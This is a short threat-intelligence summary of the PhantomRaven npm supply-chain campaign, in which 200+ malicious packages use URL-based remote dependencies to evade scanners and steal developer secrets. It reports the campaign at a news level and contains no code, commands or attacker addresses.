PhantomRaven npm: 200+ Packages Using Remote Dynamic Dependencies
Category:Threat Intelligence / Supply Chain
PhantomRaven campaign flooded npm with 200+ malicious packages (86,000+ potential victims) using a new evasion tactic: remote dynamic dependencies. What's clever: packages advertise 'zero dependencies' for false safety, but contain URL-based imports pointing to attacker-controlled servers. When installed, npm itself downloads the actual malicious package from the remote server—the secondary package grabs environment variables, collects system info, and exfiltrates to remote URLs. Analysis of 'petstore-integration-test' shows evolution: v1.0.0 used earlier malware without remote deps, while v1.0.3 and v99.0.0 incorporated advanced evasion. Sonatype tracked 83 additional packages beyond the initial discovery; attackers brandjack organizations like Adobe and Airbnb or impersonate MCP servers.
CORTEX Protocol Intelligence Assessment
By offloading malicious code to external servers, these packages bypass static analysis looking for known attack patterns. The 'zero dependencies' claim tricks both developers and scanners. What's particularly nasty: attackers can deliver clean code to some users and malware to others, making analysis tricky. The campaign started August 2025 and targets the build process itself—lifecycle hooks execute during install, reaching dev machines, CI/CD runners, and container pipelines before runtime.
Strategic Intelligence Guidance
- 200+ malicious packages, 86K+ potential victims before discovery
- Evasion technique: remote dynamic dependencies via URL-based imports
- Primary targets: npm tokens, environment variables with secrets, source-control credentials
- Evolution visible in petstore-integration-test: v1.0.0 → v1.0.3 → v99.0.0
- Brands impersonated: Adobe, Airbnb, MCP servers for social engineering
Vendors
Threats
Targets
Impact
Data Volume:86K+ potential victims
Financial:200+ packages
Intelligence Source: PhantomRaven: npm Malware Evolves Again | Nov 1, 2025